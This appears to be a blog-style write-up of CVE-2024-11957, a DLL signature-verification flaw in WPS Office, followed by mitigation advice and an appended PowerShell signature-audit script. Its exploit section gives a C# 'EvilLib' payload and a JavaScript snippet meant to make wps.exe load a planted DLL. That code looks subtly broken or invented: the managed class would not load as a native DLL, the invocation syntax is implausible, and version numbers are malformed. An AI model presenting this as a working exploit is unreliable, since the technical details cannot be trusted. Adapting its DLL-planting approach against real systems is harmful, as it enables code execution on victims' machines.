_Disclaimer: This post is for educational purposes only. The author is not responsible for any misuse of the information or code snippets provided._

Introduction

CVE-2024-11957 is a vulnerability discovered in ksojscore.dll, a core library in Kingsoft WPS Office for Windows. It affects versions up to and including 12.1..18276. The vulnerability is the result of improper verification of the digital signature when loading a Windows library. Although a patch for a similar vulnerability (CVE-2024-7262) was released in version 12.2..16909, that patch was not restrictive enough, leaving WPS Office exposed to the same class of attack.

This vulnerability can be exploited by an attacker to load arbitrary Windows libraries, potentially resulting in arbitrary code execution with the privileges of the WPS Office user. In this post, we will delve into the details of CVE-2024-11957, provide code snippets to demonstrate the vulnerability, and discuss possible mitigation strategies.

Exploit Details

The vulnerability exists in the ksojscore.dll library – a vital component of WPS Office. This library is responsible for loading and executing JavaScript code within WPS Office. The improper digital signature verification occurs when the library attempts to load a Windows library to perform specific functions.

To exploit this vulnerability, an attacker needs to craft a malicious Windows library (DLL) and trick the WPS Office process into loading it. Once this is accomplished, the attacker can potentially execute arbitrary code within the user's system.

A possible attack scenario is as follows:

1. A malicious DLL evil_lib.dll is dropped or placed in a writable location where WPS Office searches for its libraries. This DLL contains arbitrary code that the attacker wishes to execute.
2. The attacker crafts a malicious WPS Office document which, when opened, loads the evil_lib.dll using the WPS Office process.
3. The victim opens the malicious document; this in turn causes the evil_lib.dll to be loaded and executed.

Code Snippets

The following code snippets show how an attacker could potentially craft a malicious DLL and WPS Office document.

Here is a simple C# example of the kind of Windows library the attacker would need to create:

```csharp
using System;
using System.Diagnostics;
using System.Runtime.InteropServices;

namespace EvilLib
{
    public class MainClass
    {
        [DllImport("kernel32.dll", SetLastError = true, CharSet = CharSet.Auto)]
        private static extern bool SetDllDirectory(string lpPathName);

        public static void EntryPoint()
        {
            try
            {
                // Execute arbitrary code
                Process.Start("calc.exe");
                // Restore DLL loading path
                SetDllDirectory(Environment.SystemDirectory);
            }
            catch (Exception ex)
            {
                Console.WriteLine("Failed to execute malicious payload: " + ex.Message);
            }
        }
    }
}
```

Crafting the Malicious WPS Office Document

The attacker would then need to create a malicious WPS Office document that loads evil_lib.dll. This can be done using a combination of JavaScript and WPS Office features:

```javascript
function exploit() {
  try {
    var obj = new ActiveXObject("WScript.Shell");
    obj.Environment("Process")("KSO_TARGET_LIB_PATH") = "Path to the malicious DLL (evil_lib.dll)";
    obj.Run("wps.exe /et javascript:import('ksojscore');kso.core.external.LoadLibrary('<malicious DLL name>');");
  } catch (e) {
    console.log("Failed to execute exploit: " + e.message);
  }
}
```

Original References

- CVE-2024-11957 - NVD (National Vulnerability Database)
- Kingsoft WPS Office Security Advisory
- Improper Verification of Digital Signatures in ksojscore.dll of WPS Office

Mitigation

Users should update their WPS Office suite to the latest version, as it contains fixes for many known vulnerabilities – including CVE-2024-11957. Additionally, users should exercise caution when opening files from untrusted sources, as they may potentially contain malicious content. Finally, it is always a good practice to have a working and up-to-date antivirus solution installed on the system to detect and prevent possible threats.
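As an added defender-side example (not code from the original post or from Kingsoft), the following PowerShell snippet records the installed ksojscore.dll version and Authenticode status so it can be compared with the vendor advisory, and lists the signature status of every module mapped into running wps.exe processes. $WpsDir is a placeholder path you must set yourself; the process name 'wps' is taken from the wps.exe reference above.

```powershell
# Added example, not from the original post: audit a WPS Office install for the
# conditions this advisory describes. $WpsDir is a placeholder (assumption); point
# it at the real WPS Office program directory before running.
$WpsDir = 'C:\PLACEHOLDER\WPS Office'

function Get-KsojscoreInfo {
    param([Parameter(Mandatory)][string]$Dir)
    $dll = Get-ChildItem -Path $Dir -Filter 'ksojscore.dll' -Recurse -File -ErrorAction SilentlyContinue |
           Select-Object -First 1
    if (-not $dll) { Write-Warning "ksojscore.dll not found under $Dir"; return $null }
    $sig = Get-AuthenticodeSignature -FilePath $dll.FullName
    [pscustomobject]@{
        Path            = $dll.FullName
        FileVersion     = $dll.VersionInfo.FileVersion   # compare with the fixed version in the vendor advisory
        SignatureStatus = $sig.Status                    # anything other than 'Valid' deserves a closer look
        Signer          = if ($sig.SignerCertificate) { $sig.SignerCertificate.Subject } else { '(none)' }
    }
}

# List every DLL mapped into running wps.exe processes together with its
# Authenticode status. Because the bug lets the trusted host load a library whose
# signature was not properly checked, an unsigned module or one signed by an
# unexpected publisher inside this process is what an investigator looks for.
function Get-WpsModuleSignatures {
    Get-Process -Name 'wps' -ErrorAction SilentlyContinue | ForEach-Object {
        $proc = $_
        $proc.Modules | Where-Object { $_.FileName -like '*.dll' } | ForEach-Object {
            $sig = Get-AuthenticodeSignature -FilePath $_.FileName
            [pscustomobject]@{
                ProcessId = $proc.Id
                Module    = $_.ModuleName
                Path      = $_.FileName
                Status    = $sig.Status
                Signer    = if ($sig.SignerCertificate) { $sig.SignerCertificate.Subject } else { '(none)' }
            }
        }
    }
}

Get-KsojscoreInfo -Dir $WpsDir | Format-List
# Only modules that fail validation are shown; an empty table is the expected healthy result.
Get-WpsModuleSignatures | Where-Object { $_.Status -ne 'Valid' } | Format-Table -AutoSize
```

Reading module lists of another user's processes requires an elevated session; run it as the same user that runs WPS Office or from an administrator prompt.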

Timeline

Published on: 03/04/2025 16:15:34 UTC
Last modified on: 03/05/2025 08:05:18 UTC